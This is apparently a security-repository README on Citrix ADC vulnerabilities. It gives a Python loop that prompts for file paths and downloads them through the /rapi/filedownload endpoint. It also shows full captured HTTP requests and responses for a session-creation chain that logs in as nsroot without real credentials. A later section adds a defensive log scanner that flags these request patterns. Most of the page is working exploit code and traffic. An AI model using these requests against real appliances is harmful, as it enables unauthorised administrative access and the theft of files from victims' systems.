# Citrix ADC Vulns
## CVE List
https://support.citrix.com/article/CTX276688
![](./Citrix_ADC.png)
##### Added `if`/`while` code
https://dmaasland.github.io/posts/citrix.html
```
response_str = json.dumps(r.headers.__dict__['_store'])
if r.status_code == 406 and "Content-Disposition" in response_str and r.headers["Accept-Ranges"] == "bytes" and r.headers["Pragma"] == "private":
    print ("[+] Send Success!")
    print ("_"*80,"\n\n")
    print (r.text)
    print ("_"*80)
    while 1:
        PAYLOAD1 = quote(input("\n[+] Set File= "),"utf-8")
        url = '{0}/rapi/filedownload?filter=path:{1}'.format(base_url, PAYLOAD1)
        r = session.post(url=url, headers=headers, data=data, verify=False,proxies=proxies)
        if r.status_code == 406 and "Content-Disposition" in response_str and r.headers["Accept-Ranges"] == "bytes" and r.headers["Pragma"] == "private":
            print ("_"*80,"\n\n")
            print (r.text)
            print ("_"*80)
        # pass
else:
    print ("[+] Error!")
```
![](./index.png)
![](./send.png)
## 0x01 create_session
```
POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1
Host: 10.20.24.248
User-Agent: python-requests/2.24.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/xml
X-NITRO-USER: Cu59z69j
X-NITRO-PASS: vgR7HPQ0
Content-Length: 44

<appfwprofile><login></login></appfwprofile>
```
```
HTTP/1.1 406 Not Acceptable
Date: Fri, 10 Jul 2020 18:45:26 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Set-Cookie: SESSID=3be0633199c076f0613d084b758978c3; path=/; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-XSS-Protection: 1; mode=block
Content-Security-Policy: default-src 'self'; style-src 'self' 'unsafe-inline' http://cdn.pendo.io https://data.pendo.io https://pendo-static-5175857953112064.storage.googleapis.com; script-src 'self' 'unsafe-inline' 'unsafe-eval' http://yui.yahooapis.com https://cis.citrix.com http://query.yahooapis.com https://cdn.pendo.io https://data.pendo.io https://pendo-static-5175857953112064.storage.googleapis.com; connect-src 'self' http://cis.citrix.com https://s3.amazonaws.com; img-src 'self' data: blob: http://cdn.pendo.io https://data.pendo.io https://pendo-static-5175857953112064.storage.googleapis.com;
Content-Length: 4489
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/xml; charset=utf-8

<div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div>
```
## 0x02 fix_session
```
GET /menu/ss?sid=nsroot&username=nsroot&force_setup=1 HTTP/1.1
Host: 10.20.24.248
User-Agent: python-requests/2.24.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: SESSID=3be0633199c076f0613d084b758978c3
```
```
HTTP/1.1 302 Found
Date: Fri, 10 Jul 2020 18:45:27 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: is_cisco_platform=0; expires=Mon, 05-Jul-2021 18:45:27 GMT; Max-Age=31104000; path=/; HttpOnly
Location: /menu/neo
X-XSS-Protection: 1; mode=block
Content-Security-Policy: default-src 'self'; style-src 'self' 'unsafe-inline' http://cdn.pendo.io https://data.pendo.io https://pendo-static-5175857953112064.storage.googleapis.com; script-src 'self' 'unsafe-inline' 'unsafe-eval' http://yui.yahooapis.com https://cis.citrix.com http://query.yahooapis.com https://cdn.pendo.io https://data.pendo.io https://pendo-static-5175857953112064.storage.googleapis.com; connect-src 'self' http://cis.citrix.com https://s3.amazonaws.com; img-src 'self' data: blob: http://cdn.pendo.io https://data.pendo.io https://pendo-static-5175857953112064.storage.googleapis.com;
Content-Length: 416
Keep-Alive: timeout=15, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div>
```
##### 302 redirect to /menu/neo
```
GET /menu/neo HTTP/1.1
Host: 10.20.24.248
User-Agent: python-requests/2.24.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: SESSID=3be0633199c076f0613d084b758978c3; is_cisco_platform=0
```
```
HTTP/1.1 200 OK
Date: Fri, 10 Jul 2020 18:45:29 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: startupapp=neo; expires=Mon, 05-Jul-2021 18:45:29 GMT; Max-Age=31104000; path=/; HttpOnly
Vary: Accept-Encoding
X-XSS-Protection: 1; mode=block
Content-Security-Policy: default-src 'self'; style-src 'self' 'unsafe-inline' http://cdn.pendo.io https://data.pendo.io https://pendo-static-5175857953112064.storage.googleapis.com; script-src 'self' 'unsafe-inline' 'unsafe-eval' http://yui.yahooapis.com https://cis.citrix.com http://query.yahooapis.com https://cdn.pendo.io https://data.pendo.io https://pendo-static-5175857953112064.storage.googleapis.com; connect-src 'self' http://cis.citrix.com https://s3.amazonaws.com; img-src 'self' data: blob: http://cdn.pendo.io https://data.pendo.io https://pendo-static-5175857953112064.storage.googleapis.com;
Content-Length: 1771
Keep-Alive: timeout=15, max=98
Connection: Keep-Alive
Content-Type: text/html;application/octet-stream;application/ecmascript;application/json;application/xml;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XDEV_HTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Citrix ADC - Configuration</title>
<script type="text/javascript">var neo_logout_url = "/menu/lo?rand=1450749159.1594406727843271";</script>
<script type="text/javascript">var neo_machine_sysid = "450010";var rand = "1450749159.1594406727843271";var partition_dir = "";var is_ha_supported_in_gui = "true";var login_warning = "";</script>
<script type="text/javascript">var global_data = "{global_data}";</script>
```
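A defender-side check for the request sequence captured above, as an added example that is not part of the original repository: it scans access-log lines for the `/pcidss/report`, `/menu/ss` and `/rapi/filedownload` requests shown on this page and reports clients that sent them in order. The combined-log line format, the sample lines and all function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (assumed Apache combined-style format).
SAMPLE_LOG = """\
192.0.2.10 - - [10/Jul/2020:18:45:26 +0000] "POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1" 406 4489
192.0.2.10 - - [10/Jul/2020:18:45:27 +0000] "GET /menu/ss?sid=nsroot&username=nsroot&force_setup=1 HTTP/1.1" 302 416
192.0.2.10 - - [10/Jul/2020:18:45:31 +0000] "POST /rapi/filedownload?filter=path:%2Fexample%2Ffile HTTP/1.1" 406 1200
198.51.100.7 - - [10/Jul/2020:18:46:02 +0000] "GET /menu/neo HTTP/1.1" 200 1771
198.51.100.7 - - [10/Jul/2020:18:46:05 +0000] "GET /pcidss/report?type=allprofiles HTTP/1.1" 200 900
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')

def classify(method, target):
    """Return the stage name a request matches, or None for ordinary traffic."""
    parts = urlsplit(target)
    query = parse_qs(parts.query, keep_blank_values=True)
    def first(key):
        return query.get(key, [""])[0]
    # POST to the report endpoint with a sid shaped like the one in the capture.
    if (parts.path == "/pcidss/report" and method == "POST"
            and first("sid").startswith("loginchallengeresponse")):
        return "create_session"
    if parts.path == "/menu/ss" and first("force_setup") == "1":
        return "fix_session"
    if parts.path == "/rapi/filedownload" and first("filter").startswith("path:"):
        return "filedownload"
    return None

def scan(log_text):
    """Map client address -> ordered list of matched stages."""
    hits = {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the assumed format
        client, method, target, _status = m.groups()
        stage = classify(method, target)
        if stage:
            hits.setdefault(client, []).append(stage)
    return hits

def flagged(log_text):
    """Clients that sent the session-creating request and then a later stage."""
    return sorted(c for c, s in scan(log_text).items()
                  if "create_session" in s
                  and set(s[s.index("create_session") + 1:]) - {"create_session"})
```
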
## 0x03 get_rand
```
GET /menu/stc HTTP/1.1
Host: 10.20.24.248
User-Agent: python-requests/2.24.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: SESSID=3be0633199c076f0613d084b758978c3; is_cisco_platform=0; startupapp=neo
```
```
HTTP/1.1 200 OK
Date: Fri, 10 Jul 2020 18:45:30 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
X-XSS-Protection: 1; mode=block
Content-Security-Policy: default-src 'self'; style-src 'self' 'unsafe-inline' http://cdn.pendo.io https://data.pendo.io https://pendo-static-5175857953112064.storage.googleapis.com; script-src 'self' 'unsafe-inline' 'unsafe-eval' http://yui.yahooapis.com https://cis.citrix.com http://query.yahooapis.com https://cdn.pendo.io https://data.pendo.io https://pendo-static-5175857953112064.storage.googleapis.com; connect-src 'self' http://cis.citrix.com https://s3.amazonaws.com; img-src 'self' data: blob: http://cdn.pendo.io https://data.pendo.io https://pendo-static-5175857953112064.storage.googleapis.com;
Content-Length: 15505
Keep-Alive: timeout=15, max=97
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang=
```